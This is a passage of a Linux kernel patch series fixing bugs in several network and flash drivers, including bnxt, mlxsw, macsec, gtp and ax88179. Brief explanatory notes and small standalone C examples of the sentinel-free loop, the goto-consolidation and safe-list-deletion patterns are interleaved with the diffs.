+index 5d2ddb037a9a2..2068025d56396 100644
+--- a/drivers/mtd/nand/raw/diskonchip.c
++++ b/drivers/mtd/nand/raw/diskonchip.c
+@@ -53,7 +53,7 @@ static unsigned long doc_locations[] __initdata = {
+ 	0xe8000, 0xea000, 0xec000, 0xee000,
+ #endif
+ #endif
+-	0xffffffff };
++};
+ 
+ static struct mtd_info *doclist = NULL;
+ 
+@@ -1552,7 +1552,7 @@ static int __init init_nanddoc(void)
+ 		if (ret < 0)
+ 			return ret;
+ 	} else {
+-		for (i = 0; (doc_locations[i] != 0xffffffff); i++) {
++		for (i = 0; i < ARRAY_SIZE(doc_locations); i++) {
+ 			doc_probe(doc_locations[i]);
+ 		}
+ 	}
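
The diskonchip hunks drop the 0xffffffff end-of-table sentinel and iterate with ARRAY_SIZE() instead, which cannot walk past the array even if a terminator entry is removed or miscounted. The same pattern in standalone C:

#include <stddef.h>
#include <stdio.h>

#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))

static const unsigned long locations[] = {
	0xc8000, 0xca000, 0xcc000,	/* no terminator entry required */
};

int main(void)
{
	for (size_t i = 0; i < ARRAY_SIZE(locations); i++)
		printf("probe %#lx\n", locations[i]);
	return 0;
}
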
+diff --git a/drivers/net/ethernet/broadcom/b44.c b/drivers/net/ethernet/broadcom/b44.c
+index 7f876721596c1..5b6209f5a8017 100644
+--- a/drivers/net/ethernet/broadcom/b44.c
++++ b/drivers/net/ethernet/broadcom/b44.c
+@@ -2033,12 +2033,14 @@ static int b44_set_pauseparam(struct net_device *dev,
+ 		bp->flags |= B44_FLAG_TX_PAUSE;
+ 	else
+ 		bp->flags &= ~B44_FLAG_TX_PAUSE;
+-	if (bp->flags & B44_FLAG_PAUSE_AUTO) {
+-		b44_halt(bp);
+-		b44_init_rings(bp);
+-		b44_init_hw(bp, B44_FULL_RESET);
+-	} else {
+-		__b44_set_flow_ctrl(bp, bp->flags);
++	if (netif_running(dev)) {
++		if (bp->flags & B44_FLAG_PAUSE_AUTO) {
++			b44_halt(bp);
++			b44_init_rings(bp);
++			b44_init_hw(bp, B44_FULL_RESET);
++		} else {
++			__b44_set_flow_ctrl(bp, bp->flags);
++		}
+ 	}
+ 	spin_unlock_irq(&bp->lock);
+ 
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt.c b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+index 0d0aad7141c15..77ea19bcdc6fe 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt.c
+@@ -1697,7 +1697,7 @@ static inline struct sk_buff *bnxt_tpa_end(struct bnxt *bp,
+ 		skb = bnxt_copy_skb(bnapi, data_ptr, len, mapping);
+ 		if (!skb) {
+ 			bnxt_abort_tpa(cpr, idx, agg_bufs);
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
++			cpr->bnapi->cp_ring.sw_stats.rx.rx_oom_discards += 1;
+ 			return NULL;
+ 		}
+ 	} else {
+@@ -1707,7 +1707,7 @@ static inline struct sk_buff *bnxt_tpa_end(struct bnxt *bp,
+ 		new_data = __bnxt_alloc_rx_frag(bp, &new_mapping, GFP_ATOMIC);
+ 		if (!new_data) {
+ 			bnxt_abort_tpa(cpr, idx, agg_bufs);
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
++			cpr->bnapi->cp_ring.sw_stats.rx.rx_oom_discards += 1;
+ 			return NULL;
+ 		}
+ 
+@@ -1723,7 +1723,7 @@ static inline struct sk_buff *bnxt_tpa_end(struct bnxt *bp,
+ 		if (!skb) {
+ 			skb_free_frag(data);
+ 			bnxt_abort_tpa(cpr, idx, agg_bufs);
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
++			cpr->bnapi->cp_ring.sw_stats.rx.rx_oom_discards += 1;
+ 			return NULL;
+ 		}
+ 		skb_reserve(skb, bp->rx_offset);
+@@ -1734,7 +1734,7 @@ static inline struct sk_buff *bnxt_tpa_end(struct bnxt *bp,
+ 		skb = bnxt_rx_agg_pages_skb(bp, cpr, skb, idx, agg_bufs, true);
+ 		if (!skb) {
+ 			/* Page reuse already handled by bnxt_rx_pages(). */
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
++			cpr->bnapi->cp_ring.sw_stats.rx.rx_oom_discards += 1;
+ 			return NULL;
+ 		}
+ 	}
+@@ -1950,11 +1950,8 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 			u32 frag_len = bnxt_rx_agg_pages_xdp(bp, cpr, &xdp,
+ 							     cp_cons, agg_bufs,
+ 							     false);
+-			if (!frag_len) {
+-				cpr->sw_stats.rx.rx_oom_discards += 1;
+-				rc = -ENOMEM;
+-				goto next_rx;
+-			}
++			if (!frag_len)
++				goto oom_next_rx;
+ 		}
+ 		xdp_active = true;
+ 	}
+@@ -1977,9 +1974,7 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 				else
+ 					bnxt_xdp_buff_frags_free(rxr, &xdp);
+ 			}
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
+-			rc = -ENOMEM;
+-			goto next_rx;
++			goto oom_next_rx;
+ 		}
+ 	} else {
+ 		u32 payload;
+@@ -1990,29 +1985,21 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 			payload = 0;
+ 		skb = bp->rx_skb_func(bp, rxr, cons, data, data_ptr, dma_addr,
+ 				      payload | len);
+-		if (!skb) {
+-			cpr->sw_stats.rx.rx_oom_discards += 1;
+-			rc = -ENOMEM;
+-			goto next_rx;
+-		}
++		if (!skb)
++			goto oom_next_rx;
+ 	}
+ 
+ 	if (agg_bufs) {
+ 		if (!xdp_active) {
+ 			skb = bnxt_rx_agg_pages_skb(bp, cpr, skb, cp_cons, agg_bufs, false);
+-			if (!skb) {
+-				cpr->sw_stats.rx.rx_oom_discards += 1;
+-				rc = -ENOMEM;
+-				goto next_rx;
+-			}
++			if (!skb)
++				goto oom_next_rx;
+ 		} else {
+ 			skb = bnxt_xdp_build_skb(bp, skb, agg_bufs, rxr->page_pool, &xdp, rxcmp1);
+ 			if (!skb) {
+ 				/* we should be able to free the old skb here */
+ 				bnxt_xdp_buff_frags_free(rxr, &xdp);
+-				cpr->sw_stats.rx.rx_oom_discards += 1;
+-				rc = -ENOMEM;
+-				goto next_rx;
++				goto oom_next_rx;
+ 			}
+ 		}
+ 	}
+@@ -2090,6 +2077,11 @@ static int bnxt_rx_pkt(struct bnxt *bp, struct bnxt_cp_ring_info *cpr,
+ 	*raw_cons = tmp_raw_cons;
+ 
+ 	return rc;
++
++oom_next_rx:
++	cpr->bnapi->cp_ring.sw_stats.rx.rx_oom_discards += 1;
++	rc = -ENOMEM;
++	goto next_rx;
+ }
+ 
+ /* In netpoll mode, if we are using a combined completion ring, we need to
+@@ -2135,7 +2127,7 @@ static int bnxt_force_rx_discard(struct bnxt *bp,
+ 	}
+ 	rc = bnxt_rx_pkt(bp, cpr, raw_cons, event);
+ 	if (rc && rc != -EBUSY)
+-		cpr->sw_stats.rx.rx_netpoll_discards += 1;
++		cpr->bnapi->cp_ring.sw_stats.rx.rx_netpoll_discards += 1;
+ 	return rc;
+ }
+ 
+@@ -11812,6 +11804,16 @@ static void bnxt_rx_ring_reset(struct bnxt *bp)
+ 	bnxt_rtnl_unlock_sp(bp);
+ }
+ 
++static void bnxt_fw_fatal_close(struct bnxt *bp)
++{
++	bnxt_tx_disable(bp);
++	bnxt_disable_napi(bp);
++	bnxt_disable_int_sync(bp);
++	bnxt_free_irq(bp);
++	bnxt_clear_int_mode(bp);
++	pci_disable_device(bp->pdev);
++}
++
+ static void bnxt_fw_reset_close(struct bnxt *bp)
+ {
+ 	bnxt_ulp_stop(bp);
+@@ -11825,12 +11827,7 @@ static void bnxt_fw_reset_close(struct bnxt *bp)
+ 		pci_read_config_word(bp->pdev, PCI_SUBSYSTEM_ID, &val);
+ 		if (val == 0xffff)
+ 			bp->fw_reset_min_dsecs = 0;
+-		bnxt_tx_disable(bp);
+-		bnxt_disable_napi(bp);
+-		bnxt_disable_int_sync(bp);
+-		bnxt_free_irq(bp);
+-		bnxt_clear_int_mode(bp);
+-		pci_disable_device(bp->pdev);
++		bnxt_fw_fatal_close(bp);
+ 	}
+ 	__bnxt_close_nic(bp, true, false);
+ 	bnxt_vf_reps_free(bp);
+@@ -13978,6 +13975,7 @@ static pci_ers_result_t bnxt_io_error_detected(struct pci_dev *pdev,
+ {
+ 	struct net_device *netdev = pci_get_drvdata(pdev);
+ 	struct bnxt *bp = netdev_priv(netdev);
++	bool abort = false;
+ 
+ 	netdev_info(netdev, "PCI I/O error detected\n");
+ 
+@@ -13986,16 +13984,27 @@ static pci_ers_result_t bnxt_io_error_detected(struct pci_dev *pdev,
+ 
+ 	bnxt_ulp_stop(bp);
+ 
+-	if (state == pci_channel_io_perm_failure) {
++	if (test_and_set_bit(BNXT_STATE_IN_FW_RESET, &bp->state)) {
++		netdev_err(bp->dev, "Firmware reset already in progress\n");
++		abort = true;
++	}
++
++	if (abort || state == pci_channel_io_perm_failure) {
+ 		rtnl_unlock();
+ 		return PCI_ERS_RESULT_DISCONNECT;
+ 	}
+ 
+-	if (state == pci_channel_io_frozen)
++	/* Link is not reliable anymore if state is pci_channel_io_frozen
++	 * so we disable bus master to prevent any potential bad DMAs before
++	 * freeing kernel memory.
++	 */
++	if (state == pci_channel_io_frozen) {
+ 		set_bit(BNXT_STATE_PCI_CHANNEL_IO_FROZEN, &bp->state);
++		bnxt_fw_fatal_close(bp);
++	}
+ 
+ 	if (netif_running(netdev))
+-		bnxt_close(netdev);
++		__bnxt_close_nic(bp, true, true);
+ 
+ 	if (pci_is_enabled(pdev))
+ 		pci_disable_device(pdev);
+@@ -14081,6 +14090,7 @@ static pci_ers_result_t bnxt_io_slot_reset(struct pci_dev *pdev)
+ 	}
+ 
+ reset_exit:
++	clear_bit(BNXT_STATE_IN_FW_RESET, &bp->state);
+ 	bnxt_clear_reservations(bp, true);
+ 	rtnl_unlock();
+ 
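
Several of the bnxt_rx_pkt() hunks above replace repeated "bump the OOM counter, set -ENOMEM, goto next_rx" sequences with a single oom_next_rx label, which is also where the cpr->bnapi->cp_ring redirection lands once instead of at every failure site. The consolidation pattern, reduced to a sketch:

#include <errno.h>
#include <stdio.h>

static int oom_discards;

static int rx_pkt(int alloc_ok)
{
	int rc = 0;

	if (!alloc_ok)
		goto oom_next_rx;
	/* ... normal receive path ... */
next_rx:
	return rc;

oom_next_rx:
	oom_discards++;		/* one place accounts every OOM drop */
	rc = -ENOMEM;
	goto next_rx;
}

int main(void)
{
	int ok = rx_pkt(1);
	int oom = rx_pkt(0);

	printf("%d %d discards=%d\n", ok, oom, oom_discards);
	return 0;
}
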
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index a9db1ed74d3fc..9efd4b962dce2 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -16173,8 +16173,8 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	val = (rd32(&pf->hw, I40E_PRTGL_SAH) &
+ 	       I40E_PRTGL_SAH_MFS_MASK) >> I40E_PRTGL_SAH_MFS_SHIFT;
+ 	if (val < MAX_FRAME_SIZE_DEFAULT)
+-		dev_warn(&pdev->dev, "MFS for port %x has been set below the default: %x\n",
+-			 pf->hw.port, val);
++		dev_warn(&pdev->dev, "MFS for port %x (%d) has been set below the default (%d)\n",
++			 pf->hw.port, val, MAX_FRAME_SIZE_DEFAULT);
+ 
+ 	/* Add a filter to drop all Flow control frames from any VSI from being
+ 	 * transmitted. By doing so we stop a malicious VF from sending out
+@@ -16716,7 +16716,7 @@ static int __init i40e_init_module(void)
+ 	 * since we need to be able to guarantee forward progress even under
+ 	 * memory pressure.
+ 	 */
+-	i40e_wq = alloc_workqueue("%s", WQ_MEM_RECLAIM, 0, i40e_driver_name);
++	i40e_wq = alloc_workqueue("%s", 0, 0, i40e_driver_name);
+ 	if (!i40e_wq) {
+ 		pr_err("%s: Failed to create workqueue\n", i40e_driver_name);
+ 		return -ENOMEM;
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_main.c b/drivers/net/ethernet/intel/iavf/iavf_main.c
+index b9c4b311cd625..53b9fe35d8035 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_main.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_main.c
+@@ -3631,6 +3631,34 @@ static void iavf_del_all_cloud_filters(struct iavf_adapter *adapter)
+ 	spin_unlock_bh(&adapter->cloud_filter_list_lock);
+ }
+ 
++/**
++ * iavf_is_tc_config_same - Compare the mqprio TC config with the
++ * TC config already configured on this adapter.
++ * @adapter: board private structure
++ * @mqprio_qopt: TC config received from kernel.
++ *
++ * This function compares the TC config received from the kernel
++ * with the config already configured on the adapter.
++ *
++ * Return: True if configuration is same, false otherwise.
++ **/
++static bool iavf_is_tc_config_same(struct iavf_adapter *adapter,
++				   struct tc_mqprio_qopt *mqprio_qopt)
++{
++	struct virtchnl_channel_info *ch = &adapter->ch_config.ch_info[0];
++	int i;
++
++	if (adapter->num_tc != mqprio_qopt->num_tc)
++		return false;
++
++	for (i = 0; i < adapter->num_tc; i++) {
++		if (ch[i].count != mqprio_qopt->count[i] ||
++		    ch[i].offset != mqprio_qopt->offset[i])
++			return false;
++	}
++	return true;
++}
++
+ /**
+  * __iavf_setup_tc - configure multiple traffic classes
+  * @netdev: network interface device structure
+@@ -3688,7 +3716,7 @@ static int __iavf_setup_tc(struct net_device *netdev, void *type_data)
+ 		if (ret)
+ 			return ret;
+ 		/* Return if same TC config is requested */
+-		if (adapter->num_tc == num_tc)
++		if (iavf_is_tc_config_same(adapter, &mqprio_qopt->qopt))
+ 			return 0;
+ 		adapter->num_tc = num_tc;
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+index a7832a0180ee6..48cf691842b54 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_accel/macsec.c
+@@ -1703,6 +1703,7 @@ static const struct macsec_ops macsec_offload_ops = {
+ 	.mdo_add_secy = mlx5e_macsec_add_secy,
+ 	.mdo_upd_secy = mlx5e_macsec_upd_secy,
+ 	.mdo_del_secy = mlx5e_macsec_del_secy,
++	.rx_uses_md_dst = true,
+ };
+ 
+ bool mlx5e_macsec_handle_tx_skb(struct mlx5e_macsec *macsec, struct sk_buff *skb)
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/core.c b/drivers/net/ethernet/mellanox/mlxsw/core.c
+index e2a985ec2c765..f36a416ffcfe9 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/core.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/core.c
+@@ -792,7 +792,7 @@ static void mlxsw_emad_rx_listener_func(struct sk_buff *skb, u16 local_port,
+ 
+ static const struct mlxsw_listener mlxsw_emad_rx_listener =
+ 	MLXSW_RXL(mlxsw_emad_rx_listener_func, ETHEMAD, TRAP_TO_CPU, false,
+-		  EMAD, DISCARD);
++		  EMAD, FORWARD);
+ 
+ static int mlxsw_emad_init(struct mlxsw_core *mlxsw_core)
+ {
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+index 41eac7dfb67e7..685bcf8cbfa9a 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c
+@@ -780,7 +780,9 @@ static void mlxsw_sp_acl_tcam_vregion_rehash_work(struct work_struct *work)
+ 			     rehash.dw.work);
+ 	int credits = MLXSW_SP_ACL_TCAM_VREGION_REHASH_CREDITS;
+ 
++	mutex_lock(&vregion->lock);
+ 	mlxsw_sp_acl_tcam_vregion_rehash(vregion->mlxsw_sp, vregion, &credits);
++	mutex_unlock(&vregion->lock);
+ 	if (credits < 0)
+ 		/* Rehash gone out of credits so it was interrupted.
+ 		 * Schedule the work as soon as possible to continue.
+@@ -790,6 +792,17 @@ static void mlxsw_sp_acl_tcam_vregion_rehash_work(struct work_struct *work)
+ 		mlxsw_sp_acl_tcam_vregion_rehash_work_schedule(vregion);
+ }
+ 
++static void
++mlxsw_sp_acl_tcam_rehash_ctx_vchunk_reset(struct mlxsw_sp_acl_tcam_rehash_ctx *ctx)
++{
++	/* The entry markers are relative to the current chunk and therefore
++	 * needs to be reset together with the chunk marker.
++	 */
++	ctx->current_vchunk = NULL;
++	ctx->start_ventry = NULL;
++	ctx->stop_ventry = NULL;
++}
++
+ static void
+ mlxsw_sp_acl_tcam_rehash_ctx_vchunk_changed(struct mlxsw_sp_acl_tcam_vchunk *vchunk)
+ {
+@@ -812,7 +825,7 @@ mlxsw_sp_acl_tcam_rehash_ctx_vregion_changed(struct mlxsw_sp_acl_tcam_vregion *v
+ 	 * the current chunk pointer to make sure all chunks
+ 	 * are properly migrated.
+ 	 */
+-	vregion->rehash.ctx.current_vchunk = NULL;
++	mlxsw_sp_acl_tcam_rehash_ctx_vchunk_reset(&vregion->rehash.ctx);
+ }
+ 
+ static struct mlxsw_sp_acl_tcam_vregion *
+@@ -885,10 +898,14 @@ mlxsw_sp_acl_tcam_vregion_destroy(struct mlxsw_sp *mlxsw_sp,
+ 	struct mlxsw_sp_acl_tcam *tcam = vregion->tcam;
+ 
+ 	if (vgroup->vregion_rehash_enabled && ops->region_rehash_hints_get) {
++		struct mlxsw_sp_acl_tcam_rehash_ctx *ctx = &vregion->rehash.ctx;
++
+ 		mutex_lock(&tcam->lock);
+ 		list_del(&vregion->tlist);
+ 		mutex_unlock(&tcam->lock);
+-		cancel_delayed_work_sync(&vregion->rehash.dw);
++		if (cancel_delayed_work_sync(&vregion->rehash.dw) &&
++		    ctx->hints_priv)
++			ops->region_rehash_hints_put(ctx->hints_priv);
+ 	}
+ 	mlxsw_sp_acl_tcam_vgroup_vregion_detach(mlxsw_sp, vregion);
+ 	if (vregion->region2)
+@@ -1254,8 +1271,14 @@ mlxsw_sp_acl_tcam_ventry_activity_get(struct mlxsw_sp *mlxsw_sp,
+ 				      struct mlxsw_sp_acl_tcam_ventry *ventry,
+ 				      bool *activity)
+ {
+-	return mlxsw_sp_acl_tcam_entry_activity_get(mlxsw_sp,
+-						    ventry->entry, activity);
++	struct mlxsw_sp_acl_tcam_vregion *vregion = ventry->vchunk->vregion;
++	int err;
++
++	mutex_lock(&vregion->lock);
++	err = mlxsw_sp_acl_tcam_entry_activity_get(mlxsw_sp, ventry->entry,
++						   activity);
++	mutex_unlock(&vregion->lock);
++	return err;
+ }
+ 
+ static int
+@@ -1289,6 +1312,8 @@ mlxsw_sp_acl_tcam_vchunk_migrate_start(struct mlxsw_sp *mlxsw_sp,
+ {
+ 	struct mlxsw_sp_acl_tcam_chunk *new_chunk;
+ 
++	WARN_ON(vchunk->chunk2);
++
+ 	new_chunk = mlxsw_sp_acl_tcam_chunk_create(mlxsw_sp, vchunk, region);
+ 	if (IS_ERR(new_chunk))
+ 		return PTR_ERR(new_chunk);
+@@ -1307,7 +1332,7 @@ mlxsw_sp_acl_tcam_vchunk_migrate_end(struct mlxsw_sp *mlxsw_sp,
+ {
+ 	mlxsw_sp_acl_tcam_chunk_destroy(mlxsw_sp, vchunk->chunk2);
+ 	vchunk->chunk2 = NULL;
+-	ctx->current_vchunk = NULL;
++	mlxsw_sp_acl_tcam_rehash_ctx_vchunk_reset(ctx);
+ }
+ 
+ static int
+@@ -1330,6 +1355,9 @@ mlxsw_sp_acl_tcam_vchunk_migrate_one(struct mlxsw_sp *mlxsw_sp,
+ 		return 0;
+ 	}
+ 
++	if (list_empty(&vchunk->ventry_list))
++		goto out;
++
+ 	/* If the migration got interrupted, we have the ventry to start from
+ 	 * stored in context.
+ 	 */
+@@ -1339,6 +1367,8 @@ mlxsw_sp_acl_tcam_vchunk_migrate_one(struct mlxsw_sp *mlxsw_sp,
+ 		ventry = list_first_entry(&vchunk->ventry_list,
+ 					  typeof(*ventry), list);
+ 
++	WARN_ON(ventry->vchunk != vchunk);
++
+ 	list_for_each_entry_from(ventry, &vchunk->ventry_list, list) {
+ 		/* During rollback, once we reach the ventry that failed
+ 		 * to migrate, we are done.
+@@ -1379,6 +1409,7 @@ mlxsw_sp_acl_tcam_vchunk_migrate_one(struct mlxsw_sp *mlxsw_sp,
+ 		}
+ 	}
+ 
++out:
+ 	mlxsw_sp_acl_tcam_vchunk_migrate_end(mlxsw_sp, vchunk, ctx);
+ 	return 0;
+ }
+@@ -1392,6 +1423,9 @@ mlxsw_sp_acl_tcam_vchunk_migrate_all(struct mlxsw_sp *mlxsw_sp,
+ 	struct mlxsw_sp_acl_tcam_vchunk *vchunk;
+ 	int err;
+ 
++	if (list_empty(&vregion->vchunk_list))
++		return 0;
++
+ 	/* If the migration got interrupted, we have the vchunk
+ 	 * we are working on stored in context.
+ 	 */
+@@ -1420,16 +1454,17 @@ mlxsw_sp_acl_tcam_vregion_migrate(struct mlxsw_sp *mlxsw_sp,
+ 	int err, err2;
+ 
+ 	trace_mlxsw_sp_acl_tcam_vregion_migrate(mlxsw_sp, vregion);
+-	mutex_lock(&vregion->lock);
+ 	err = mlxsw_sp_acl_tcam_vchunk_migrate_all(mlxsw_sp, vregion,
+ 						   ctx, credits);
+ 	if (err) {
++		if (ctx->this_is_rollback)
++			return err;
+ 		/* In case migration was not successful, we need to swap
+ 		 * so the original region pointer is assigned again
+ 		 * to vregion->region.
+ 		 */
+ 		swap(vregion->region, vregion->region2);
+-		ctx->current_vchunk = NULL;
++		mlxsw_sp_acl_tcam_rehash_ctx_vchunk_reset(ctx);
+ 		ctx->this_is_rollback = true;
+ 		err2 = mlxsw_sp_acl_tcam_vchunk_migrate_all(mlxsw_sp, vregion,
+ 							    ctx, credits);
+@@ -1440,7 +1475,6 @@ mlxsw_sp_acl_tcam_vregion_migrate(struct mlxsw_sp *mlxsw_sp,
+ 			/* Let the rollback to be continued later on. */
+ 		}
+ 	}
+-	mutex_unlock(&vregion->lock);
+ 	trace_mlxsw_sp_acl_tcam_vregion_migrate_end(mlxsw_sp, vregion);
+ 	return err;
+ }
+@@ -1489,6 +1523,7 @@ mlxsw_sp_acl_tcam_vregion_rehash_start(struct mlxsw_sp *mlxsw_sp,
+ 
+ 	ctx->hints_priv = hints_priv;
+ 	ctx->this_is_rollback = false;
++	mlxsw_sp_acl_tcam_rehash_ctx_vchunk_reset(ctx);
+ 
+ 	return 0;
+ 
+@@ -1541,7 +1576,8 @@ mlxsw_sp_acl_tcam_vregion_rehash(struct mlxsw_sp *mlxsw_sp,
+ 	err = mlxsw_sp_acl_tcam_vregion_migrate(mlxsw_sp, vregion,
+ 						ctx, credits);
+ 	if (err) {
+-		dev_err(mlxsw_sp->bus_info->dev, "Failed to migrate vregion\n");
++		dev_err_ratelimited(mlxsw_sp->bus_info->dev, "Failed to migrate vregion\n");
++		return;
+ 	}
+ 
+ 	if (*credits >= 0)
+diff --git a/drivers/net/ethernet/ti/am65-cpts.c b/drivers/net/ethernet/ti/am65-cpts.c
+index 9948ac14e68db..c1bdf045e9815 100644
+--- a/drivers/net/ethernet/ti/am65-cpts.c
++++ b/drivers/net/ethernet/ti/am65-cpts.c
+@@ -649,6 +649,11 @@ static bool am65_cpts_match_tx_ts(struct am65_cpts *cpts,
+ 		struct am65_cpts_skb_cb_data *skb_cb =
+ 					(struct am65_cpts_skb_cb_data *)skb->cb;
+ 
++		if ((ptp_classify_raw(skb) & PTP_CLASS_V1) &&
++		    ((mtype_seqid & AM65_CPTS_EVENT_1_SEQUENCE_ID_MASK) ==
++		     (skb_cb->skb_mtype_seqid & AM65_CPTS_EVENT_1_SEQUENCE_ID_MASK)))
++			mtype_seqid = skb_cb->skb_mtype_seqid;
++
+ 		if (mtype_seqid == skb_cb->skb_mtype_seqid) {
+ 			u64 ns = event->timestamp;
+ 
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 7086acfed5b90..05b5914d83582 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -1110,11 +1110,12 @@ static int gtp_newlink(struct net *src_net, struct net_device *dev,
+ static void gtp_dellink(struct net_device *dev, struct list_head *head)
+ {
+ 	struct gtp_dev *gtp = netdev_priv(dev);
++	struct hlist_node *next;
+ 	struct pdp_ctx *pctx;
+ 	int i;
+ 
+ 	for (i = 0; i < gtp->hash_size; i++)
+-		hlist_for_each_entry_rcu(pctx, &gtp->tid_hash[i], hlist_tid)
++		hlist_for_each_entry_safe(pctx, next, &gtp->tid_hash[i], hlist_tid)
+ 			pdp_context_delete(pctx);
+ 
+ 	list_del_rcu(&gtp->list);
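
gtp_dellink() now walks each hash chain with hlist_for_each_entry_safe() because pdp_context_delete() unlinks the entry being visited; the _safe variant caches the next pointer before the current node can go away. The underlying idea in plain C:

#include <stdio.h>

struct node {
	int id;
	struct node *next;
};

static void delete_all(struct node **head)
{
	struct node *n = *head, *next;

	while (n) {
		next = n->next;		/* save before unlinking */
		printf("deleting %d\n", n->id);
		n->next = NULL;		/* unlink (the driver frees here) */
		n = next;		/* safe: taken from the saved copy */
	}
	*head = NULL;
}

int main(void)
{
	struct node c = { 3, NULL }, b = { 2, &c }, a = { 1, &b };
	struct node *head = &a;

	delete_all(&head);
	return 0;
}
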
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 209ee9f352754..8a8fd74110e2c 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -1007,10 +1007,12 @@ static enum rx_handler_result handle_not_macsec(struct sk_buff *skb)
+ 	struct metadata_dst *md_dst;
+ 	struct macsec_rxh_data *rxd;
+ 	struct macsec_dev *macsec;
++	bool is_macsec_md_dst;
+ 
+ 	rcu_read_lock();
+ 	rxd = macsec_data_rcu(skb->dev);
+ 	md_dst = skb_metadata_dst(skb);
++	is_macsec_md_dst = md_dst && md_dst->type == METADATA_MACSEC;
+ 
+ 	list_for_each_entry_rcu(macsec, &rxd->secys, secys) {
+ 		struct sk_buff *nskb;
+@@ -1021,10 +1023,42 @@ static enum rx_handler_result handle_not_macsec(struct sk_buff *skb)
+ 		 * the SecTAG, so we have to deduce which port to deliver to.
+ 		 */
+ 		if (macsec_is_offloaded(macsec) && netif_running(ndev)) {
+-			if (md_dst && md_dst->type == METADATA_MACSEC &&
+-			    (!find_rx_sc(&macsec->secy, md_dst->u.macsec_info.sci)))
++			const struct macsec_ops *ops;
++
++			ops = macsec_get_ops(macsec, NULL);
++
++			if (ops->rx_uses_md_dst && !is_macsec_md_dst)
+ 				continue;
+ 
++			if (is_macsec_md_dst) {
++				struct macsec_rx_sc *rx_sc;
++
++				/* All drivers that implement MACsec offload
++				 * support using skb metadata destinations must
++				 * indicate that they do so.
++				 */
++				DEBUG_NET_WARN_ON_ONCE(!ops->rx_uses_md_dst);
++				rx_sc = find_rx_sc(&macsec->secy,
++						   md_dst->u.macsec_info.sci);
++				if (!rx_sc)
++					continue;
++				/* device indicated macsec offload occurred */
++				skb->dev = ndev;
++				skb->pkt_type = PACKET_HOST;
++				eth_skb_pkt_type(skb, ndev);
++				ret = RX_HANDLER_ANOTHER;
++				goto out;
++			}
++
++			/* This datapath is insecure because it is unable to
++			 * enforce isolation of broadcast/multicast traffic and
++			 * unicast traffic with promiscuous mode on the macsec
++			 * netdev. Since the core stack has no mechanism to
++			 * check that the hardware did indeed receive MACsec
++			 * traffic, it is possible that the response handling
++			 * done by the MACsec port was to a plaintext packet.
++			 * This violates the MACsec protocol standard.
++			 */
+ 			if (ether_addr_equal_64bits(hdr->h_dest,
+ 						    ndev->dev_addr)) {
+ 				/* exact match, divert skb to this port */
+@@ -1040,11 +1074,7 @@ static enum rx_handler_result handle_not_macsec(struct sk_buff *skb)
+ 					break;
+ 
+ 				nskb->dev = ndev;
+-				if (ether_addr_equal_64bits(hdr->h_dest,
+-							    ndev->broadcast))
+-					nskb->pkt_type = PACKET_BROADCAST;
+-				else
+-					nskb->pkt_type = PACKET_MULTICAST;
++				eth_skb_pkt_type(nskb, ndev);
+ 
+ 				__netif_rx(nskb);
+ 			}
+diff --git a/drivers/net/usb/ax88179_178a.c b/drivers/net/usb/ax88179_178a.c
+index 3078511f76083..21b6c4d94a632 100644
+--- a/drivers/net/usb/ax88179_178a.c
++++ b/drivers/net/usb/ax88179_178a.c
+@@ -1456,21 +1456,16 @@ static int ax88179_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 			/* Skip IP alignment pseudo header */
+ 			skb_pull(skb, 2);
+ 
+-			skb->truesize = SKB_TRUESIZE(pkt_len_plus_padd);
+ 			ax88179_rx_checksum(skb, pkt_hdr);
+ 			return 1;
+ 		}
+ 
+-		ax_skb = skb_clone(skb, GFP_ATOMIC);
++		ax_skb = netdev_alloc_skb_ip_align(dev->net, pkt_len);
+ 		if (!ax_skb)
+ 			return 0;
+-		skb_trim(ax_skb, pkt_len);
++		skb_put(ax_skb, pkt_len);
++		memcpy(ax_skb->data, skb->data + 2, pkt_len);
+ 
+-		/* Skip IP alignment pseudo header */
+-		skb_pull(ax_skb, 2);
+-
+-		skb->truesize = pkt_len_plus_padd +
+-				SKB_DATA_ALIGN(sizeof(struct sk_buff));
+ 		ax88179_rx_checksum(ax_skb, pkt_hdr);
+ 		usbnet_skb_return(dev, ax_skb);
+ 
